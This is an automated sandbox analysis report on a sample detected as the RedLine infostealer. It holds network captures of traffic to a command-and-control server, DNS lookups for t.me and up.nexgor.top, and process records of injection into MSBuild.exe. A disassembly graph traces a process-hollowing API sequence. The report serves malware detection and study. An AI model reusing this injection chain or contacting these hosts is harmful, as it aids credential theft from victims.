                      Jul 27, 2024 01:36:57.967387915 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.967442989 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.967452049 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.967530012 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.967538118 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.967540026 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.967603922 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.982470036 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.987457991 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.987660885 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.987735033 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.987735033 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.987796068 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:57.992934942 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993012905 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993021011 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993051052 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993058920 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993113041 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993120909 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993159056 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993232965 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993242025 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993249893 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993263960 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993272066 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993282080 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:57.993297100 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.013712883 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:58.022423983 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.022609949 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:58.022680044 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:58.022680044 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:58.022701025 CEST497313306192.168.2.4157.90.30.125
                      Jul 27, 2024 01:36:58.030999899 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031016111 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031101942 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031110048 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031120062 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031198978 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031208038 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031266928 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031316042 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031400919 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031409979 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031447887 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031455994 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031465054 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.031548977 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.059164047 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.942121983 CEST330649731157.90.30.125192.168.2.4
                      Jul 27, 2024 01:36:58.950685978 CEST497313306192.168.2.4157.90.30.125

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 27, 2024 01:36:53.592025042 CEST6416553192.168.2.41.1.1.1
                      Jul 27, 2024 01:36:53.598893881 CEST53641651.1.1.1192.168.2.4
                      Jul 27, 2024 01:36:55.015060902 CEST6453353192.168.2.41.1.1.1
                      Jul 27, 2024 01:36:55.041532993 CEST53645331.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 27, 2024 01:36:53.592025042 CEST192.168.2.41.1.1.10x3fc6Standard query (0)t.meA (IP address)IN (0x0001)false
                      Jul 27, 2024 01:36:55.015060902 CEST192.168.2.41.1.1.10xc8e0Standard query (0)up.nexgor.topA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 27, 2024 01:36:53.598893881 CEST1.1.1.1192.168.2.40x3fc6No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                      Jul 27, 2024 01:36:55.041532993 CEST1.1.1.1192.168.2.40xc8e0No error (0)up.nexgor.top157.90.30.125A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • t.me

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449730149.154.167.994437060C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      TimestampBytes transferredDirectionData
                      2024-07-26 23:36:54 UTC71OUTGET /+J_Z1QGHfHko0MGZi HTTP/1.1
                      Host: t.me
                      Connection: Keep-Alive
                      2024-07-26 23:36:54 UTC511INHTTP/1.1 200 OK
                      Server: nginx/1.18.0
                      Date: Fri, 26 Jul 2024 23:36:54 GMT
                      Content-Type: text/html; charset=utf-8
                      Content-Length: 12287
                      Connection: close
                      Set-Cookie: stel_ssid=a2920d2053a7f75094_2736110378737127224; expires=Sat, 27 Jul 2024 23:36:54 GMT; path=/; samesite=None; secure; HttpOnly
                      Pragma: no-cache
                      Cache-control: no-store
                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                      Strict-Transport-Security: max-age=35768000
                      2024-07-26 23:36:54 UTC12287INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 4a 6f 69 6e 20 47 72 6f 75 70 20 43 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Join Group Chat</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:19:36:51
                      Start date:26/07/2024
                      Path:C:\Users\user\Desktop\CCdaw0qbbo.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\CCdaw0qbbo.exe"
                      Imagebase:0x480000
                      File size:566'784 bytes
                      MD5 hash:1C7FA29F87C23ABFA490A5E8909A310A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:19:36:52
                      Start date:26/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:19:36:52
                      Start date:26/07/2024
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Imagebase:0x910000
                      File size:262'432 bytes
                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:20.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:12.6%
                        Total number of Nodes:659
                        Total number of Limit Nodes:15
                        execution_graph 13497 6e357e10 13539 6e357e30 __InternalCxxFrameHandler 13497->13539 13498 6e357e47 13499 6e365f56 WriteProcessMemory 13498->13499 13500 6e365f00 ReadProcessMemory 13498->13500 13501 6e36369b CreateProcessW 13498->13501 13502 6e358015 13498->13502 13498->13539 13499->13539 13500->13539 13501->13539 13503 6e358030 13502->13503 13502->13539 13504 6e358301 13503->13504 13503->13539 13505 6e35857f 13504->13505 13504->13539 13506 6e3586a2 13505->13506 13505->13539 13507 6e363a2a VirtualAllocEx 13506->13507 13508 6e36380e VirtualAlloc 13506->13508 13511 6e3587bb 13506->13511 13506->13539 13507->13539 13508->13539 13509 6e3647b6 ReadProcessMemory 13509->13539 13510 6e364e11 CloseHandle CloseHandle 13510->13539 13511->13509 13511->13510 13512 6e36385c Wow64GetThreadContext 13511->13512 13515 6e35fd1e GetConsoleWindow ShowWindow 13511->13515 13518 6e363ba3 WriteProcessMemory 13511->13518 13520 6e365065 13511->13520 13523 6e364cfd WriteProcessMemory Wow64SetThreadContext ResumeThread 13511->13523 13524 6e365fe5 CloseHandle CloseHandle 13511->13524 13525 6e35a93f 13511->13525 13511->13539 13512->13539 13541 6e3511e0 13515->13541 13517 6e3511e0 22 API calls 13517->13539 13518->13539 13579 6e366790 13520->13579 13522 6e36506f 13523->13539 13524->13539 13526 6e3656b3 GetConsoleWindow ShowWindow 13525->13526 13530 6e35ab0d 13525->13530 13525->13539 13527 6e3511e0 22 API calls 13526->13527 13528 6e3656e0 13527->13528 13529 6e3511e0 22 API calls 13528->13529 13529->13539 13531 6e365d48 WriteProcessMemory 13530->13531 13532 6e35adf9 13530->13532 13530->13539 13531->13539 13533 6e364940 WriteProcessMemory 13532->13533 13534 6e35b077 13532->13534 13532->13539 13533->13539 13535 6e365c4f 13534->13535 13537 6e35b195 13534->13537 13534->13539 13536 6e351000 5 API calls 13535->13536 13536->13539 13538 6e363e70 WriteProcessMemory 13537->13538 13537->13539 13571 6e357ab0 13538->13571 13539->13498 13539->13517 13562 6e357640 GetModuleHandleW 13539->13562 13575 6e351000 13539->13575 13547 6e351247 __InternalCxxFrameHandler 13541->13547 13542 6e3567e6 K32GetModuleInformation 13542->13547 13543 6e356e81 FindCloseChangeNotification 13543->13547 13544 6e3569ab CloseHandle 13544->13547 13545 6e35693c CreateFileMappingA 13545->13547 13546 6e356ce4 VirtualProtect 13546->13547 13547->13542 13547->13543 13547->13544 13547->13545 13547->13546 13548 6e356d83 VirtualProtect 13547->13548 13549 6e356fae 13547->13549 13552 6e3566bf GetCurrentProcess 13547->13552 13553 6e3568a3 GetModuleFileNameA CreateFileA 13547->13553 13554 6e3569da MapViewOfFile 13547->13554 13555 6e356752 GetModuleHandleA 13547->13555 13556 6e357526 VirtualProtect 13547->13556 13559 6e357441 GetCurrentProcess 13547->13559 13560 6e357486 K32GetModuleInformation 13547->13560 13561 6e356ea1 CloseHandle CloseHandle 13547->13561 13548->13547 13550 6e366790 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13549->13550 13551 6e356fb8 13550->13551 13551->13539 13552->13547 13553->13547 13554->13547 13555->13547 13586 6e3674f0 13556->13586 13559->13547 13560->13547 13561->13547 13567 6e357671 13562->13567 13563 6e357a3d 13564 6e366790 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13563->13564 13565 6e357a4d VirtualAllocEx 13564->13565 13565->13539 13566 6e357a57 GetProcAddress 13570 6e35781d __InternalCxxFrameHandler 13566->13570 13567->13563 13567->13566 13568 6e3578a3 NtQueryInformationProcess 13567->13568 13569 6e3577e4 GetProcAddress 13567->13569 13568->13567 13569->13570 13570->13567 13572 6e357b0e 13571->13572 13573 6e366790 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13572->13573 13574 6e357dcf 13573->13574 13574->13539 13578 6e351057 13575->13578 13576 6e366790 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13577 6e3511c5 13576->13577 13577->13539 13578->13576 13580 6e366798 13579->13580 13581 6e366799 IsProcessorFeaturePresent 13579->13581 13580->13522 13583 6e366b3e 13581->13583 13588 6e366b01 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13583->13588 13585 6e366c21 13585->13522 13587 6e3575c5 VirtualProtect 13586->13587 13587->13547 13588->13585 13589 6e36679e 13590 6e3667dc 13589->13590 13591 6e3667a9 13589->13591 13628 6e3668f8 13590->13628 13593 6e3667ce 13591->13593 13594 6e3667ae 13591->13594 13601 6e3667f1 13593->13601 13596 6e3667c4 13594->13596 13597 6e3667b3 13594->13597 13620 6e366dab 13596->13620 13600 6e3667b8 13597->13600 13615 6e366dca 13597->13615 13602 6e3667fd ___scrt_is_nonwritable_in_current_image 13601->13602 13655 6e366e3b 13602->13655 13604 6e366804 __DllMainCRTStartup@12 13605 6e3668f0 13604->13605 13606 6e36682b 13604->13606 13612 6e366867 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 13604->13612 13674 6e366fda IsProcessorFeaturePresent 13605->13674 13666 6e366d9d 13606->13666 13609 6e3668f7 13610 6e36683a __RTC_Initialize 13610->13612 13669 6e366cbb InitializeSListHead 13610->13669 13612->13600 13613 6e366848 13613->13612 13670 6e366d72 13613->13670 13766 6e36a453 13615->13766 14071 6e367c8c 13620->14071 13623 6e366db4 13623->13600 13626 6e366dc7 13626->13600 13627 6e367c97 21 API calls 13627->13623 13629 6e366904 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 13628->13629 13630 6e366935 13629->13630 13631 6e3669a0 13629->13631 13647 6e36690d 13629->13647 14091 6e366e0b 13630->14091 13632 6e366fda __DllMainCRTStartup@12 4 API calls 13631->13632 13636 6e3669a7 ___scrt_is_nonwritable_in_current_image 13632->13636 13634 6e36693a 14100 6e366cc7 13634->14100 13637 6e3669c3 13636->13637 13638 6e3669dd dllmain_raw 13636->13638 13640 6e3669d8 13636->13640 13637->13600 13638->13637 13641 6e3669f7 dllmain_crt_dispatch 13638->13641 13639 6e36693f __RTC_Initialize __DllMainCRTStartup@12 14103 6e366fac 13639->14103 14112 6e366040 13640->14112 13641->13637 13641->13640 13647->13600 13648 6e366a49 13648->13637 13649 6e366a52 dllmain_crt_dispatch 13648->13649 13649->13637 13651 6e366a65 dllmain_raw 13649->13651 13650 6e366040 __DllMainCRTStartup@12 5 API calls 13652 6e366a30 13650->13652 13651->13637 13653 6e3668f8 __DllMainCRTStartup@12 81 API calls 13652->13653 13654 6e366a3e dllmain_raw 13653->13654 13654->13648 13656 6e366e44 13655->13656 13678 6e367198 IsProcessorFeaturePresent 13656->13678 13660 6e366e55 13661 6e366e59 13660->13661 13688 6e36a436 13660->13688 13661->13604 13664 6e366e70 13664->13604 13760 6e366e74 13666->13760 13668 6e366da4 13668->13610 13669->13613 13671 6e366d77 ___scrt_release_startup_lock 13670->13671 13672 6e367198 IsProcessorFeaturePresent 13671->13672 13673 6e366d80 13671->13673 13672->13673 13673->13612 13675 6e366ff0 __InternalCxxFrameHandler 13674->13675 13676 6e36709b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13675->13676 13677 6e3670df __InternalCxxFrameHandler 13676->13677 13677->13609 13679 6e366e50 13678->13679 13680 6e367c6d 13679->13680 13697 6e36813c 13680->13697 13683 6e367c76 13683->13660 13685 6e367c7e 13686 6e367c89 13685->13686 13711 6e368178 13685->13711 13686->13660 13751 6e36cf58 13688->13751 13691 6e367c9f 13692 6e367cb2 13691->13692 13693 6e367ca8 13691->13693 13692->13661 13694 6e368121 ___vcrt_uninitialize_ptd 6 API calls 13693->13694 13695 6e367cad 13694->13695 13696 6e368178 ___vcrt_uninitialize_locks DeleteCriticalSection 13695->13696 13696->13692 13698 6e368145 13697->13698 13700 6e36816e 13698->13700 13702 6e367c72 13698->13702 13715 6e36876c 13698->13715 13701 6e368178 ___vcrt_uninitialize_locks DeleteCriticalSection 13700->13701 13701->13702 13702->13683 13703 6e3680ee 13702->13703 13732 6e36867d 13703->13732 13706 6e368103 13706->13685 13709 6e36811e 13709->13685 13712 6e3681a2 13711->13712 13713 6e368183 13711->13713 13712->13683 13714 6e36818d DeleteCriticalSection 13713->13714 13714->13712 13714->13714 13720 6e368592 13715->13720 13718 6e3687a4 InitializeCriticalSectionAndSpinCount 13719 6e36878f 13718->13719 13719->13698 13721 6e3685af 13720->13721 13724 6e3685b3 13720->13724 13721->13718 13721->13719 13722 6e36861b GetProcAddress 13722->13721 13724->13721 13724->13722 13725 6e36860c 13724->13725 13727 6e368632 LoadLibraryExW 13724->13727 13725->13722 13726 6e368614 FreeLibrary 13725->13726 13726->13722 13728 6e368679 13727->13728 13729 6e368649 GetLastError 13727->13729 13728->13724 13729->13728 13730 6e368654 ___vcrt_FlsSetValue 13729->13730 13730->13728 13731 6e36866a LoadLibraryExW 13730->13731 13731->13724 13733 6e368592 ___vcrt_FlsSetValue 5 API calls 13732->13733 13734 6e368697 13733->13734 13735 6e3686b0 TlsAlloc 13734->13735 13736 6e3680f8 13734->13736 13736->13706 13737 6e36872e 13736->13737 13738 6e368592 ___vcrt_FlsSetValue 5 API calls 13737->13738 13739 6e368748 13738->13739 13740 6e368763 TlsSetValue 13739->13740 13741 6e368111 13739->13741 13740->13741 13741->13709 13742 6e368121 13741->13742 13743 6e36812b 13742->13743 13744 6e368131 13742->13744 13746 6e3686b8 13743->13746 13744->13706 13747 6e368592 ___vcrt_FlsSetValue 5 API calls 13746->13747 13748 6e3686d2 13747->13748 13749 6e3686ea TlsFree 13748->13749 13750 6e3686de 13748->13750 13749->13750 13750->13744 13752 6e36cf68 13751->13752 13753 6e366e62 13751->13753 13752->13753 13755 6e36ce1c 13752->13755 13753->13664 13753->13691 13756 6e36ce23 13755->13756 13757 6e36ce66 GetStdHandle 13756->13757 13758 6e36cec8 13756->13758 13759 6e36ce79 GetFileType 13756->13759 13757->13756 13758->13752 13759->13756 13761 6e366e84 13760->13761 13762 6e366e80 13760->13762 13763 6e366fda __DllMainCRTStartup@12 4 API calls 13761->13763 13765 6e366e91 ___scrt_release_startup_lock 13761->13765 13762->13668 13764 6e366efa 13763->13764 13765->13668 13772 6e36ab4b 13766->13772 13769 6e367c97 14051 6e368023 13769->14051 13773 6e366dcf 13772->13773 13774 6e36ab55 13772->13774 13773->13769 13780 6e36cba7 13774->13780 13796 6e36ca45 13780->13796 13782 6e36cbc3 13783 6e36cbde TlsGetValue 13782->13783 13784 6e36ab5c 13782->13784 13784->13773 13785 6e36cbe6 13784->13785 13786 6e36ca45 _unexpected 5 API calls 13785->13786 13787 6e36cc02 13786->13787 13788 6e36cc20 TlsSetValue 13787->13788 13789 6e36ab6f 13787->13789 13790 6e36aa12 13789->13790 13791 6e36aa2d 13790->13791 13792 6e36aa1d 13790->13792 13791->13773 13810 6e36aa33 13792->13810 13797 6e36ca75 13796->13797 13801 6e36ca71 _unexpected 13796->13801 13797->13801 13802 6e36c97a 13797->13802 13800 6e36ca8f GetProcAddress 13800->13801 13801->13782 13808 6e36c98b ___vcrt_FlsSetValue 13802->13808 13803 6e36ca21 13803->13800 13803->13801 13804 6e36c9a9 LoadLibraryExW 13805 6e36c9c4 GetLastError 13804->13805 13806 6e36ca28 13804->13806 13805->13808 13806->13803 13807 6e36ca3a FreeLibrary 13806->13807 13807->13803 13808->13803 13808->13804 13809 6e36c9f7 LoadLibraryExW 13808->13809 13809->13806 13809->13808 13811 6e36aa4e 13810->13811 13812 6e36aa48 13810->13812 13813 6e36b2c4 ___free_lconv_mon 14 API calls 13811->13813 13814 6e36b2c4 ___free_lconv_mon 14 API calls 13812->13814 13815 6e36aa5a 13813->13815 13814->13811 13816 6e36b2c4 ___free_lconv_mon 14 API calls 13815->13816 13817 6e36aa65 13816->13817 13818 6e36b2c4 ___free_lconv_mon 14 API calls 13817->13818 13819 6e36aa70 13818->13819 13820 6e36b2c4 ___free_lconv_mon 14 API calls 13819->13820 13821 6e36aa7b 13820->13821 13822 6e36b2c4 ___free_lconv_mon 14 API calls 13821->13822 13823 6e36aa86 13822->13823 13824 6e36b2c4 ___free_lconv_mon 14 API calls 13823->13824 13825 6e36aa91 13824->13825 13826 6e36b2c4 ___free_lconv_mon 14 API calls 13825->13826 13827 6e36aa9c 13826->13827 13828 6e36b2c4 ___free_lconv_mon 14 API calls 13827->13828 13829 6e36aaa7 13828->13829 13830 6e36b2c4 ___free_lconv_mon 14 API calls 13829->13830 13831 6e36aab5 13830->13831 13842 6e36a85f 13831->13842 13836 6e36b2c4 13837 6e36b2cf HeapFree 13836->13837 13838 6e36b2f9 13836->13838 13837->13838 13839 6e36b2e4 GetLastError 13837->13839 13838->13791 13840 6e36b2f1 __dosmaperr 13839->13840 13982 6e36b254 13840->13982 13843 6e36a86b ___scrt_is_nonwritable_in_current_image 13842->13843 13858 6e36aea3 EnterCriticalSection 13843->13858 13847 6e36a875 13848 6e36b2c4 ___free_lconv_mon 14 API calls 13847->13848 13849 6e36a89f 13847->13849 13848->13849 13859 6e36a8be 13849->13859 13850 6e36a8ca 13851 6e36a8d6 ___scrt_is_nonwritable_in_current_image 13850->13851 13863 6e36aea3 EnterCriticalSection 13851->13863 13853 6e36a8e0 13864 6e36ab00 13853->13864 13855 6e36a8f3 13868 6e36a913 13855->13868 13858->13847 13862 6e36aeeb LeaveCriticalSection 13859->13862 13861 6e36a8ac 13861->13850 13862->13861 13863->13853 13865 6e36ab36 _unexpected 13864->13865 13866 6e36ab0f _unexpected 13864->13866 13865->13855 13866->13865 13871 6e36db5b 13866->13871 13981 6e36aeeb LeaveCriticalSection 13868->13981 13870 6e36a901 13870->13836 13872 6e36db71 13871->13872 13874 6e36dbdb 13871->13874 13872->13874 13878 6e36dba4 13872->13878 13882 6e36b2c4 ___free_lconv_mon 14 API calls 13872->13882 13875 6e36b2c4 ___free_lconv_mon 14 API calls 13874->13875 13898 6e36dc29 13874->13898 13876 6e36dbfd 13875->13876 13877 6e36b2c4 ___free_lconv_mon 14 API calls 13876->13877 13880 6e36dc10 13877->13880 13879 6e36dbc6 13878->13879 13884 6e36b2c4 ___free_lconv_mon 14 API calls 13878->13884 13881 6e36b2c4 ___free_lconv_mon 14 API calls 13879->13881 13883 6e36b2c4 ___free_lconv_mon 14 API calls 13880->13883 13885 6e36dbd0 13881->13885 13887 6e36db99 13882->13887 13888 6e36dc1e 13883->13888 13889 6e36dbbb 13884->13889 13890 6e36b2c4 ___free_lconv_mon 14 API calls 13885->13890 13886 6e36dc97 13891 6e36b2c4 ___free_lconv_mon 14 API calls 13886->13891 13899 6e36fad6 13887->13899 13893 6e36b2c4 ___free_lconv_mon 14 API calls 13888->13893 13927 6e36fbd4 13889->13927 13890->13874 13895 6e36dc9d 13891->13895 13893->13898 13895->13865 13896 6e36dc37 13896->13886 13897 6e36b2c4 14 API calls ___free_lconv_mon 13896->13897 13897->13896 13939 6e36dccc 13898->13939 13900 6e36fae7 13899->13900 13926 6e36fbd0 13899->13926 13901 6e36faf8 13900->13901 13903 6e36b2c4 ___free_lconv_mon 14 API calls 13900->13903 13902 6e36fb0a 13901->13902 13904 6e36b2c4 ___free_lconv_mon 14 API calls 13901->13904 13905 6e36fb1c 13902->13905 13906 6e36b2c4 ___free_lconv_mon 14 API calls 13902->13906 13903->13901 13904->13902 13907 6e36fb2e 13905->13907 13908 6e36b2c4 ___free_lconv_mon 14 API calls 13905->13908 13906->13905 13909 6e36fb40 13907->13909 13911 6e36b2c4 ___free_lconv_mon 14 API calls 13907->13911 13908->13907 13910 6e36fb52 13909->13910 13912 6e36b2c4 ___free_lconv_mon 14 API calls 13909->13912 13913 6e36b2c4 ___free_lconv_mon 14 API calls 13910->13913 13915 6e36fb64 13910->13915 13911->13909 13912->13910 13913->13915 13914 6e36fb76 13917 6e36fb88 13914->13917 13919 6e36b2c4 ___free_lconv_mon 14 API calls 13914->13919 13915->13914 13916 6e36b2c4 ___free_lconv_mon 14 API calls 13915->13916 13916->13914 13918 6e36fb9a 13917->13918 13920 6e36b2c4 ___free_lconv_mon 14 API calls 13917->13920 13921 6e36fbac 13918->13921 13922 6e36b2c4 ___free_lconv_mon 14 API calls 13918->13922 13919->13917 13920->13918 13923 6e36fbbe 13921->13923 13924 6e36b2c4 ___free_lconv_mon 14 API calls 13921->13924 13922->13921 13925 6e36b2c4 ___free_lconv_mon 14 API calls 13923->13925 13923->13926 13924->13923 13925->13926 13926->13878 13928 6e36fbe1 13927->13928 13938 6e36fc39 13927->13938 13929 6e36fbf1 13928->13929 13930 6e36b2c4 ___free_lconv_mon 14 API calls 13928->13930 13931 6e36fc03 13929->13931 13933 6e36b2c4 ___free_lconv_mon 14 API calls 13929->13933 13930->13929 13932 6e36fc15 13931->13932 13934 6e36b2c4 ___free_lconv_mon 14 API calls 13931->13934 13935 6e36fc27 13932->13935 13936 6e36b2c4 ___free_lconv_mon 14 API calls 13932->13936 13933->13931 13934->13932 13937 6e36b2c4 ___free_lconv_mon 14 API calls 13935->13937 13935->13938 13936->13935 13937->13938 13938->13879 13940 6e36dcf8 13939->13940 13941 6e36dcd9 13939->13941 13940->13896 13941->13940 13945 6e36fc62 13941->13945 13944 6e36b2c4 ___free_lconv_mon 14 API calls 13944->13940 13946 6e36fc73 13945->13946 13980 6e36dcf2 13945->13980 13947 6e36fc3d _unexpected 14 API calls 13946->13947 13948 6e36fc7b 13947->13948 13949 6e36fc3d _unexpected 14 API calls 13948->13949 13950 6e36fc86 13949->13950 13951 6e36fc3d _unexpected 14 API calls 13950->13951 13952 6e36fc91 13951->13952 13953 6e36fc3d _unexpected 14 API calls 13952->13953 13954 6e36fc9c 13953->13954 13955 6e36fc3d _unexpected 14 API calls 13954->13955 13956 6e36fcaa 13955->13956 13957 6e36b2c4 ___free_lconv_mon 14 API calls 13956->13957 13958 6e36fcb5 13957->13958 13959 6e36b2c4 ___free_lconv_mon 14 API calls 13958->13959 13960 6e36fcc0 13959->13960 13961 6e36b2c4 ___free_lconv_mon 14 API calls 13960->13961 13962 6e36fccb 13961->13962 13963 6e36fc3d _unexpected 14 API calls 13962->13963 13964 6e36fcd9 13963->13964 13965 6e36fc3d _unexpected 14 API calls 13964->13965 13966 6e36fce7 13965->13966 13967 6e36fc3d _unexpected 14 API calls 13966->13967 13968 6e36fcf8 13967->13968 13969 6e36fc3d _unexpected 14 API calls 13968->13969 13970 6e36fd06 13969->13970 13971 6e36fc3d _unexpected 14 API calls 13970->13971 13972 6e36fd14 13971->13972 13973 6e36b2c4 ___free_lconv_mon 14 API calls 13972->13973 13974 6e36fd1f 13973->13974 13975 6e36b2c4 ___free_lconv_mon 14 API calls 13974->13975 13976 6e36fd2a 13975->13976 13977 6e36b2c4 ___free_lconv_mon 14 API calls 13976->13977 13978 6e36fd35 13977->13978 13979 6e36b2c4 ___free_lconv_mon 14 API calls 13978->13979 13979->13980 13980->13944 13981->13870 13985 6e36acc8 GetLastError 